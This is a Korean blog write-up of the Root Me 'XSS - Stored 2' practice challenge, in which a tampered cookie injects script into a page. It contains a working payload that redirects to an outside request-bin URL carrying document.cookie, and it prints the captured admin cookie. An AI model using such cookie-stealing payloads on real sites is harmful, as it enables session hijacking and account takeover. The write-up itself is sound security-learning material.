https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-2
Challenges/Web - Client : XSS - Stored 2 [Root Me : Hacking and Information Security learning platform]
www.root-me.org
문제 확인
관리자 세션의 쿠키를 탈취해 관리자 페이지에 접속하라는 미션
XSS는 Cross Site Scripting의 약자로, 웹 서버에 관리자가 아닌 사용자가 악성 스크립트를 삽입할 수 있는 취약점을 뜻함
일반적으로 공격자는 자신의 서버를 준비해두고, XSS 취약점을 이용해 타겟 웹 서버에 악성 스크립트를 삽입한 후, 사용자들의 인증 정보(쿠키, 세션 값 등)를 탈취하는 데 활용
문제 풀이
아무거나 입력해봄
글을 쓰면 저렇게 옆에 status 가 같이 찍혀서 나옴
해당 페이지에서 관리자 도구로 쿠키값 확인
status 라는 이름의 쿠키에 invite 라는 값이 저장되어 있는데 이걸 변조하여 XSS 공격 시도
status 쿠키의 값을 abcd"><script>alert(1)</script> 로 변경
결과적으로 <i class="abcd"><script>alert(1)</script>">status : invite</i> 가 입력되어 alert(1) 실행
입력 후 새로고침
alert(1) 이 실행되어서 알림창이 뜨는 걸 확인
RequestBin에 가서 요청을 받아줄 주소를 하나 생성
RequestBin.com — A modern request bin to collect, inspect and debug HTTP requests and webhooks
public.requestbin.com
abcd"><script>document.location.href="https://eno89qi8uyyqq.x.pipedream.net?cookie="+document.cookie</script>
생성한 주소를 활용해 위와 같이 쿠키값을 설정
아무글이나 하나 작성하고 대기
작성하고 엔터치면 아래와 같이 창이 출력되는 걸 확인
RequestBin에 찍혀있는 ADMIN_COOKIE 를 확인
ADMIN_COOKIE=SY2USDIH78TF3DFU78546TE7
ModHeader 설치
ModHeader - Modify HTTP headers - Chrome 웹 스토어
Modify HTTP request headers, response headers, and redirect URLs
chromewebstore.google.com
알아낸 쿠키값을 ModHeader를 이용해 변경
admin 버튼을 클릭하면 성공!!
'SWLUG > web hacking' 카테고리의 다른 글
[DreamHack] Mango (0) | 2024.11.17 |
---|---|
[CTF/ Dreamhack] login-1 (0) | 2024.11.17 |
[WebGoat] Cross Site Scripting (0) | 2024.11.13 |
[Dreamhack] DOM XSS (0) | 2024.11.13 |
[RootMe] Directory traversal (1) | 2024.11.04 |